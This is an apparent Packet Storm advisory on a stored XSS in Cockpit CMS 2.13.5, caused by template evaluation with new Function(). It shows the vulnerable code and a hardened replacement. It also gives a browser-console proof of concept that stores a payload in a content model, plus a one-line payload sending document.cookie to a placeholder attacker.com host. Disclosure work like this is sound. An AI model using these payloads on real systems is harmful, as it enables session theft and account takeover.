Cockpit CMS 2.13.5 Cross Site Scripting

Published: 08 Apr 2026 | Reported by: Gaurav Joshi | Type: packetstorm | Source: packetstorm.news

Cockpit CMS 2.13.5: persistent (stored) XSS in the content model display template via the interpolate helper. Any authenticated user who can edit content models can store a payload that executes for every user who opens the Content page.

*Description:* Cockpit CMS version 2.13.5 has a stored (persistent) XSS in the
    content model display template. The $interpolate function in
    /modules/App/assets/js/app/utils.js builds a JavaScript template literal
    from the display string and evaluates it with new Function(), so any
    ${...} expression in the template is executed as arbitrary JavaScript in
    the admin UI. Any authenticated user who can edit content models can store
    a payload in the model's meta.display field; it fires automatically,
    without further interaction, for every user who visits the Content page.
    Impact includes session hijacking, account takeover, and privilege
    escalation.
    
    Source URL: https://github.com/Cockpit-HQ/Cockpit
    Software URL: https://getcockpit.com/
    
Vulnerable Code (/modules/App/assets/js/app/utils.js):
    
    // str is the user-controlled display template; it is wrapped in backticks
    // and compiled as a template literal, so every ${...} inside it runs as code.
    let interpolate = function(str, params) {
        const names = Object.keys(params);
        const vals = Object.values(params);
        return new Function(...names, `return \`${str}\`;`)(...vals);
    }
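The evaluation path, as an added example that is not Cockpit's code: the vulnerable interpolate above is reproduced verbatim next to a hardened replacement (this editor's suggestion, not a patch shipped by the project) that substitutes ${name} placeholders by looking them up in params and never evaluates the template. The parameter name `data` and the sample item are assumptions; the hostile template sets a marker on globalThis instead of document.title so the effect is observable in Node as well as in a browser.

```javascript
// Added example (not Cockpit's code). Vulnerable helper from utils.js,
// reproduced as-is: the template is compiled as a JS template literal.
function interpolateUnsafe(str, params) {
  const names = Object.keys(params);
  const vals = Object.values(params);
  return new Function(...names, `return \`${str}\`;`)(...vals);
}

// Hardened replacement (editor's suggestion): only ${identifier} or
// ${a.b.c} placeholders are recognised, and they are resolved by property
// lookup in params. Nothing in the template is ever evaluated, so a stored
// payload such as ${fetch(...)} stays inert text.
function interpolateSafe(str, params) {
  const placeholder = /\$\{\s*([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)\s*\}/g;
  return String(str).replace(placeholder, (match, path) => {
    let value = params;
    for (const key of path.split('.')) {
      if (value === null || typeof value !== 'object' ||
          !Object.prototype.hasOwnProperty.call(value, key)) {
        return ''; // unknown placeholder renders empty, never evaluates
      }
      value = value[key];
    }
    return value === undefined || value === null ? '' : String(value);
  });
}

// Constructed sample item standing in for a collection entry; "data" is an
// assumed parameter name, not necessarily what Cockpit passes.
const item = { title: 'Hello', status: 'published' };

// A benign display template of the kind an editor would legitimately write.
const benignTemplate = '${data.title} (${data.status})';

// A hostile meta.display value like the one in the advisory, but writing a
// marker to globalThis instead of document.title so it is visible in Node.
const hostileTemplate = "${globalThis.__xss_fired = 'yes'}";

function demo() {
  const benignUnsafe = interpolateUnsafe(benignTemplate, { data: item });
  const benignSafe = interpolateSafe(benignTemplate, { data: item });

  delete globalThis.__xss_fired;
  const hostileUnsafe = interpolateUnsafe(hostileTemplate, { data: item });
  const firedUnsafe = globalThis.__xss_fired === 'yes';

  delete globalThis.__xss_fired;
  const hostileSafe = interpolateSafe(hostileTemplate, { data: item });
  const firedSafe = globalThis.__xss_fired === 'yes';

  return { benignUnsafe, benignSafe, hostileUnsafe, firedUnsafe, hostileSafe, firedSafe };
}

console.log(demo());
```

Run with node: both helpers render the benign template as "Hello (published)", but only the unsafe one executes the hostile template (it returns 'yes' and the global marker is set); the safe one returns the template unchanged as text and sets nothing. If the substituted result is inserted into the page as HTML rather than as a text node, the values would additionally need HTML escaping, which this example does not cover.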
    
    
*Steps to Reproduce:*
    1. Log in to Cockpit CMS with an account that can edit content models
    2. Create a content model called "testmodel" with a text field
    3. With the admin UI open, run this in the browser console (it reuses the
       page's CSRF token and session cookie to update the model's display
       template):
    
    const csrf = App.csrf;
    fetch('/content/models/save', {
        method: 'POST',
        credentials: 'include',
        headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': csrf },
        body: JSON.stringify({
            model: {
                name: 'testmodel',
                type: 'collection',
                // ${...} is stored literally here and evaluated later by interpolate
                meta: { display: "${document.title='XSS_CONFIRMED_' + document.domain}" }
            },
            isUpdate: true
        })
    });
    
    4. Visit /content - the browser tab title changes to
    "XSS_CONFIRMED_localhost" (the suffix is the CMS host's domain; here the
    instance runs on localhost)
    
Cookie theft payload (attacker.com is a placeholder for a server the attacker
    controls): ${fetch('https://attacker.com/?cookie=' + document.cookie)}
    
    
*Impact:*
    - Stored XSS fires automatically for every visitor of the Content page, no user interaction needed
    - Session cookies have no HttpOnly flag, allowing theft via document.cookie
    - Content editor can escalate to admin
    
    Note that setting HttpOnly would only stop cookie exfiltration; script
    running in a logged-in user's page can still call the same authenticated
    endpoints (as the PoC does with /content/models/save) on that user's behalf,
    so the fix has to be in interpolate itself.
    
    
*Disclosure Timeline:*
    - Vendor contacted, no response received
    - 2026-04-07 Public disclosure to packetstorm
